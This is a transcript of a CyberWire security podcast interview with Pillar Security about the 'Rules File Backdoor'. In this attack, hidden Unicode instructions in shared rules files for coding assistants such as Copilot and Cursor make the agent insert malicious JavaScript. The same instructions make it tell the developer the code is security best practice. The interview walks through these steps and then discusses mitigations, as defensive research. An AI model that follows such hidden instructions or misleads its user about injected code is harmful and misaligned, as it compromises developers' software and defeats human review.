Hiding in plain sight with vibe coding.

Transcript

[ Music ]

Dave Bittner: Hello, everyone, and welcome to the CyberWire's "Research Saturday." I'm Dave Bittner, and this is our weekly conversation with researchers and analysts tracking down the threats and vulnerabilities, solving some of the hard problems, and protecting ourselves in our rapidly evolving cyberspace. Thanks for joining us. [ Music ]

Ziv Karliner: Pillar Security, we spent the last year and a half spending a lot of time with emerging attack vectors that put AI-powered applications at risk. So, first of all, we got to learn and get our hands around new attack vectors such as prompt injection, indirect injections, and all sorts of evasion techniques that turn these attacks to be basically invisible to the human eye and most of the security tools out there.

Dave Bittner: That's Ziv Karliner, Pillar Security's Co-Founder and CTO. The research we're discussing today is titled "New Vulnerability in GitHub Copilot and Cursor: How Hackers Can Weaponize Code Agents." [ Music ]

Ziv Karliner: So take that together with the fact that we ourselves are utilizing these amazing coding Copilots that on their own are utilizing LLM and its base. Got us, you know, thinking about how the combination of the new attack vectors and the actual, I would say, some of the most popular use cases for the AI-powered applications, which are coding assistants, how this really combines together and sparked our imagination about what can potentially go wrong.

Dave Bittner: Well, at the root of this is what you all refer to as the Rules File Backdoor. Can you describe that for us? What exactly are we talking about here?

Ziv Karliner: Sure. So maybe one step back. So what are rule files? So think about coding agents this day. You can think about them as another engineer, developer that joined the team and now helps you complete a project much quicker. So rule files are basically a way to onboard the coding agent to your project, to your team, to tell it what are the best practices that are being used in a project, what software stack are we using, specific syntax or any guidance and context that is relevant just to the project that we are working on right now. So think about the first day in the job for a new developer that joins the team. So that will be the rule files. Basically, text files that these coding assistants allow users to define that contain all of the examples and the instructions of how to write code in the best way that suits the project in scope. So these are rule files. The interesting thing when you think about it -- and this is basically context -- additional context that is being fed into the conversation flow with the coding agent. And really, it's part of the instructions. It's part of the instruction layer, the context layer that is taken into account when the model takes a request to write new code. This context is added to it before the developer gets back the code suggestions and edits. So a Rule File Backdoor is basically when attackers can embed malicious instructions in this context that impact any code that is being generated by the coding assistant to create actual backdoors in the generated code. So this is what we've shown in example. On its own, it sounds, you know, pretty straightforward, maybe, to protect. But what we uncovered in our research is that, first of all, you have marketplaces. You have now open source marketplaces where rule files are being shared between organizations, which creates a supply chain vector combined with the fact that you can add hidden instructions, that's the, I would say, the second risky part here. Some kind of technique that is called hidden Unicode characters, which basically means that when developers look at the rule file, it looks completely legitimate. But it actually contains hidden instructions that only the AI agent understands and acts on. So that's really, I would say, like, the perfect scenario where you can hide in plain sight in some of these marketplaces and compromise the underlying developers that are taking these rule files to improve their projects.

Dave Bittner: Well, can we walk through an example here? I mean, suppose an attacker wants to make use of this. Let's go through the process of how they would go about doing that.

Ziv Karliner: For sure. So, in our research, we walked through a simple example, a step-by-step example. So, for instance, let's think about an attacker that wants to compromise any Next.js application. And how you can do that? So basically, the marketplaces for rule files will have directories with -- basically, you can think about it as a directory of every available coding stack. And you can actually commit and add suggestions to these marketplaces and basically hubs of rule files that are being shared between developers. So let's take the Next.js example. I will go as an attacker to this repo. I will craft a legitimately looking instruction file about Next.js best practices. And I will embed hidden text into this file using the hidden Unicode characters technique. And we'll commit this, let's say, to GitHub or with some kind of a web form to this marketplace. What we also uncovered during the research is that in GitHub itself, it was invisible. Basically, when you commit code that contains these hidden instructions, a developer that is now going to approve this, basically, addition request is not going to see anything, is not going to get alerted. This is actually something that was solved by GitHub early this month in one of the vulnerability patches. So now we have this rule file with hidden instructions live on GitHub. An unsuspecting developer that wants to get better results with his coding project when using Cursor or GitHub is basically copying this file and adding it to its own project. Also sharing it with his team, just in order to improve the quality of code for the full team. And now, when it's going to, let's say, request an addition of a simple page to his application, the rule file that contains instructions to add, basically, malicious JavaScript code to each new HTML file that is being created, it's going to happen only when the agent loads this file, takes in the additional hidden instructions, and generates the additional code on the fly. Now, the interesting thing that we showed on our research paper is basically that in the attack itself, in the malicious instructions, an attacker could also use the agent, I would say, intelligence to its advantage. So what we've shown is that a developer can then ask, "Hey, why this code snippet was added to the code that was generated?" And the AI agent will say, "Oh, this is the security best practices of our organization." So the attacker instructions could actually be used not only to inject malicious code; it's also being used to trick the user, kind of social engineer it, to believe that this was the goal in the first place. So this is utilizing the AI agent intelligence against the end user. This was, I would say, the most interesting finding for us. [ Music ]

Dave Bittner: We'll be right back. So the hidden instructions using Unicode can also include instructions to mislead someone who's inquiring as to why things are a certain way.

Ziv Karliner: Exactly. So I can add on that some of the most, I would say, popular terms these days is human-in-the-loop. So human-in-the-loop is basically when we're talking about responsibility models and how autonomous agents will be part of the future workforce. So human-in-the-loop is the point in, I would say, autonomous processes where an AI agent goes back and asks for approval from the user that tries to achieve some kind of goal. So, in this case, most of the coding agents these days, when doing, I would say, more risky actions like changing, deleting a file, or creating a web request, they will actually stop and ask the user, "Are you sure you want to complete the next action?" This is like the classic human-in-the-loop flow. So one of the things that we've shown here in the blog is basically that if the attack itself is completely hidden to a human, are humans really equipped to be in the loop? That's one of the thoughts that got us more concerned, I would say. A lot of the responsibility is moving to the users, but are we actually equipped to deal with this kind of attacks?

Dave Bittner: I mean, it really speaks to that kind of inherent inability to view inside what's really going on in AI assistant, right?

Ziv Karliner: Exactly.

Dave Bittner: Yeah.

Ziv Karliner: And even if you think you're seeing what is going on, the assistants understand, I would say, every language that was ever spoken or written together with hidden Unicode characters, encoded strings like Base64, for instance, they just understand it as plain English without the need to compute or run any additional processes. So we are kind of not in an even situation between the, I would say, the auditor, which is now basically every person that needs to observe and kind of decide if an AI agent is allowed or not allowed to do something, and the agents themselves. So that's like -- that goes beyond the coding agents, I would say.

Dave Bittner: Well, let's talk about mitigation. What sort of steps can developers take to detect and prevent these sorts of things?

Ziv Karliner: Of course. So, first of all, I would say, as silly as it may sound, sanitation. So think about reducing basically the input options that you have when interacting with the model, even in the language level. And I can actually describe another mitigation that, lucky for us as a developer community, was actually taken by GitHub based on this research, which is they actually added a new capability in GitHub itself to alert and basically show a warning message whenever there is a hidden instruction or hidden Unicode text that is now part of a text file that is going to be edited. So this is -- I would say, kind of a risk reduction effort that is being released for every developer that uses GitHub, which is almost everyone. Another part, which is more on the agent builder side, is to take into place different guardrails that can be placed around the models when interacting with them. So, for instance, detection of evasion techniques, detection of malicious instructions, jailbreak attempts, and indirect injection attacks, which are part of these new attack vectors that are really becoming more and more relevant with AI-powered applications. There are some great work around uncovering this full attack surface with the OWASP top 10 for LLMs and MITRE ATLAS and other great initiatives that really talk this new risk language and create the right terminology around it. So I would say awareness is the first step as well.

Dave Bittner: What do you suppose this vulnerability reveals about the current state of things when it comes to AI integration and software development, which -- I mean, I think it's fair to say there's a lot of enthusiasm for? It's certainly a powerful tool, and yet we have these things. I mean, is it still early enough days that there's lots to be -- these things are important to consider as we go forward?

Ziv Karliner: For sure. So we're still in the early days, but I would say coming actually myself from experiencing the cloud security space and also in the software supply chain security space, we had, I would say, amazing progress with software supply chain security over the last decade with SBOMs becoming a standard and the vulnerability programs, you know. We put a lot of guardrails inside the CI/CD pipelines and got, I would say, a lot of awareness around it. And on the other hand, we now have this amazing phenomenon of, you know, the -- I would call it, like, the intelligence age, the AI transformation that doesn't leave any, I would say, vertical in the industry or role untouched, but it's moving really fast. So there is kind of a challenge here when both the attack vectors are being discovered as we go, but adoption is moving faster than I ever seen in my career. So it's a combination, I would say, for both the, I would say, like, the security industry in general, you see a lot of awareness, a lot of community efforts to really surface these new emerging threats. Even before we saw, you know, attack vectors being utilized in the wild, I can give an example that one of the accelerators for safer CI/CD pipelines or SolarWinds that we're all familiar with. So this really didn't happen yet in the AI security space. I guess, it's -- as always, it's a matter of time until something becomes more public because we are at the pace of adoption that is only accelerating, I would say. And the opportunities are -- I would say that there are a great opportunities these days for, you know, developer teams to move much faster and build even higher quality code if they utilize these tools in the right ways with the right context. But I would say human supervision is still much needed, especially from, you know, the right security expertise. And in order to do that, ourselves as a company, we put also -- one of our main goals is to help increase awareness with this type of research, to really also, I would say, put more effort on the responsibility metrics, right? Who is really responsible for the security issues at hand? Is it on the developers that utilize these amazing tools? Is it on the tool builders? On the model providers? There is a few different players here that are trying to put these new risks under control. And it's, I would say, a work in progress. [ Music ]

Dave Bittner: Our thanks to Ziv Karliner from Pillar Security for joining us. The research is titled "New Vulnerability in GitHub Copilot and Cursor: How Hackers Can Weaponize Code Agents." We'll have a link in the show notes. And that's "Research Saturday" brought to you by N2K CyberWire. We'd love to hear from you. We're conducting our annual audience survey to learn more about our listeners. We're collecting your insights through August 31 of this year. There's a link in the show notes. We hope you'll check it out. This episode was produced by Liz Stokes. We're mixed by Elliott Peltzman and Trey Hester. Our executive producer is Jennifer Eiben. Peter Kilpe is our publisher. And I'm Dave Bittner. Thanks for listening. We'll see you back here next time. [ Music ]

HOST(S):

Dave Bittner is a security podcast host and one of the founders at CyberWire. He's a creator, producer, videographer, actor, experimenter, and entrepreneur. He's had a long career in the worlds of television, journalism and media production, and is one of the pioneers of non-linear editing and digital storytelling.

Schedule: Saturdays

Creator: N2K Networks, Inc.